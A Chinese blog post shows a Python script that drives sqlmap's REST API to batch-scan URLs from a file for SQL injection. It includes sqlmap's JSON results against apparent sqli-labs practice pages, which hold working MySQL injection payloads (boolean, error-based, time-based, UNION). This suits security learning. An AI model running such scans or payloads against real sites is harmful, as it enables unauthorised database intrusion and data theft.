python实现sqlmapapi调用实现批量

Posted Rgylin

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python实现sqlmapapi调用实现批量相关的知识,希望对你有一定的参考价值。

环境

sqlmap是可以被python调用的

首先在cmd中输入

python sqlmapapi.py -s

创建用python 对其连接

import  requests

url='http://127.0.0.1:8775/task/new'
res1= requests.get(url)
print(res1.content.decode('utf-8'))

设置任务Id扫描信息

set_url= 'http://127.0.0.1:8775/option/'+taskId+'/set'
res_set_url= requests.post(set_url,data=json.dumps(data),headers=header)

开始扫描对应的Id人物

start_url='http://127.0.0.1:8775/scan/'+taskId+'/start'
res_start_url =requests.post(start_url,data=json.dumps(data),headers=header)
#print(res_start_url.content.decode('utf-8'))

读取扫描状态判断结果

status_url= 'http://127.0.0.1:8775/scan/'+taskId+'/status'
res_status= requests.get(status_url)
#print(res_status.content.decode('utf-8'))

读取数据

task_data_url = 'http://127.0.0.1:8775/scan/' + taskId + '/data'
task_data_res = requests.get(task_data_url)
print(task_data_res.content.decode('utf-8'))

综上脚本

import requests
import json
import time
def sqlapi(url):
    data = {
        'url': url
    }
    header = {
        'Content-Type': 'application/json'
    }
    task_new_url ="http://127.0.0.1:8775/task/new"
    res= requests.get(task_new_url)
    taskId= res.json()['taskid']
    if 'success' in res.content.decode('utf-8'):
        print('sqlmapapi create success')
        #进行设置
        task_set_url = 'http://127.0.0.1:8775/option/'+taskId+'/set'
        task_set_res= requests.post(task_set_url,data=json.dumps(data),headers= header)
        if 'success' in task_set_res.content.decode('utf-8'):
            print( 'setting success')
            #启动扫描
            task_start_url= 'http://127.0.0.1:8775/scan/'+taskId+'/start'
            task_start_res= requests.post(task_start_url,data=json.dumps(data),headers=header)
            if('success' in task_start_res.content.decode('utf-8')):
                print('scan start success')
                while 1:
                    task_status_url= 'http://127.0.0.1:8775/scan/'+taskId+'/status'
                    task_status_res= requests.get(task_status_url)
                    if('running' in task_status_res.content.decode('utf-8')):
                        print('sqlmap are running  ')
                        pass
                    else:
                        task_data_url = 'http://127.0.0.1:8775/scan/' + taskId + '/data'
                        task_data_res = requests.get(task_data_url)
                        f.write(task_data_res.content.decode('utf-8'))
                        break
                time.sleep(3)




if __name__ == '__main__':
    f= open('C:/Users/ASUS/Desktop/res.txt','a+')
    for i in open('url.txt','r').readlines():

        print(i)
        sqlapi(i)
        


   
        


效果为

{
    "success": true,
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": {
                "url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-1/",
                "query": "id=1",
                "data": null
            }
        },
        {
            "status": 1,
            "type": 1,
            "value": [
                {
                    "place": "GET",
                    "parameter": "id",
                    "ptype": 2,
                    "prefix": "'",
                    "suffix": " AND '[RANDSTR]'='[RANDSTR]",
                    "clause": [
                        1,
                        8,
                        9
                    ],
                    "notes": [],
                    "data": {
                        "1": {
                            "title": "AND boolean-based blind - WHERE or HAVING clause",
                            "payload": "id=1' AND 8661=8661 AND 'sHbo'='sHbo",
                            "where": 1,
                            "vector": "AND [INFERENCE]",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": 200,
                            "falseCode": 200
                        },
                        "2": {
                            "title": "mysql >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
                            "payload": "id=1' AND (SELECT 8903 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT (ELT(8903=8903,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vTDo'='vTDo",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": null,
                            "falseCode": null
                        },
                        "5": {
                            "title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
                            "payload": "id=1' AND (SELECT 1923 FROM (SELECT(SLEEP([SLEEPTIME])))BiUc) AND 'Tryd'='Tryd",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": 200,
                            "falseCode": null
                        },
                        "6": {
                            "title": "Generic UNION query (NULL) - 1 to 20 columns",
                            "payload": "id=-3722' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707871,0x7352646f5a70544c714d52424c656f6d534b5570614f50776b7244486c5a4d45684e6a6a4f575441,0x716a7a7171)-- -",
                            "where": 2,
                            "vector": [
                                2,
                                3,
                                "[GENERIC_SQL_COMMENT]",
                                "'",
                                " AND '[RANDSTR]'='[RANDSTR]",
                                "NULL",
                                2,
                                false,
                                null,
                                null,
                                null
                            ],
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "templatePayload": null,
                            "matchRatio": 0.955,
                            "trueCode": null,
                            "falseCode": null
                        }
                    },
                    "conf": {
                        "textOnly": null,
                        "titles": null,
                        "code": null,
                        "string": "Your",
                        "notString": null,
                        "regexp": null,
                        "optimize": null
                    },
                    "dbms": "MySQL",
                    "dbms_version": [
                        ">= 5.0"
                    ],
                    "os": null
                }
            ]
        }
    ],
    "error": []
}{
    "success": true,
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": {
                "url": "http://172a4874-82ae-4ab9-b49c-39289835c0df.node4.buuoj.cn:80/Less-2/",
                "query": "id=2",
                "data": null
            }
        },
        {
            "status": 1,
            "type": 1,
            "value": [
                {
                    "place": "GET",
                    "parameter": "id",
                    "ptype": 1,
                    "prefix": "",
                    "suffix": "",
                    "clause": [
                        1,
                        8,
                        9
                    ],
                    "notes": [],
                    "data": {
                        "1": {
                            "title": "AND boolean-based blind - WHERE or HAVING clause",
                            "payload": "id=2 AND 8114=8114",
                            "where": 1,
                            "vector": "AND [INFERENCE]",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": 200,
                            "falseCode": 200
                        },
                        "2": {
                            "title": "MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)",
                            "payload": "id=2 AND (SELECT 6380 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(6380=6380,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": null,
                            "falseCode": null
                        },
                        "5": {
                            "title": "MySQL >= 5.0.12 AND time-based blind (query SLEEP)",
                            "payload": "id=2 AND (SELECT 9669 FROM (SELECT(SLEEP([SLEEPTIME])))Seva)",
                            "where": 1,
                            "vector": "AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])",
                            "comment": "",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": 200,
                            "falseCode": null
                        },
                        "6": {
                            "title": "Generic UNION query (NULL) - 1 to 20 columns",
                            "payload": "id=-3623 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7671,0x4948684a5a6170425875694658705767516e704a77666a415346726754454e6c5376414a70546158,0x716b716b71)-- -",
                            "where": 2,
                            "vector": [
                                2,
                                3,
                                "[GENERIC_SQL_COMMENT]",
                                "",
                                "",
                                "NULL",
                                2,
                                false,
                                null,
                                null,
                                null
                            ],
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "templatePayload": null,
                            "matchRatio": 0.948,
                            "trueCode": null,
                            "falseCode": null
                        }
                    },
                    "conf": {
                        "textOnly": null,
                        "titles": null,
                        "code": null,
                        "string": "Your",
                        "notString": null,
                        "regexp": null,
                        "optimize": null
                    },
                    "dbms": "MySQL",
                    "dbms_version": [
                        ">= 5.0"
                    ],
                    "os": null
                }
            ]
        },
        {
            "status": 1,
            "type": 2,
            "value": "back-end DBMS: MySQL >= 5.0 (MariaDB fork)"
        }
    ],
    "error": []
}

以上是关于python实现sqlmapapi调用实现批量的主要内容,如果未能解决你的问题,请参考以下文章

利用sqlmapapi打造自动化SQL注入工具

Python实现批量导入Markdown文件到WordPress(博客搬家工具,代码已开源)

Python实现批量导入Markdown文件到WordPress(博客搬家工具,代码已开源)

Python调用7zip命令实现解压

python识别批量网站中的图片

阅读sqlmap源代码,编写burpsuite插件--sqlmapapi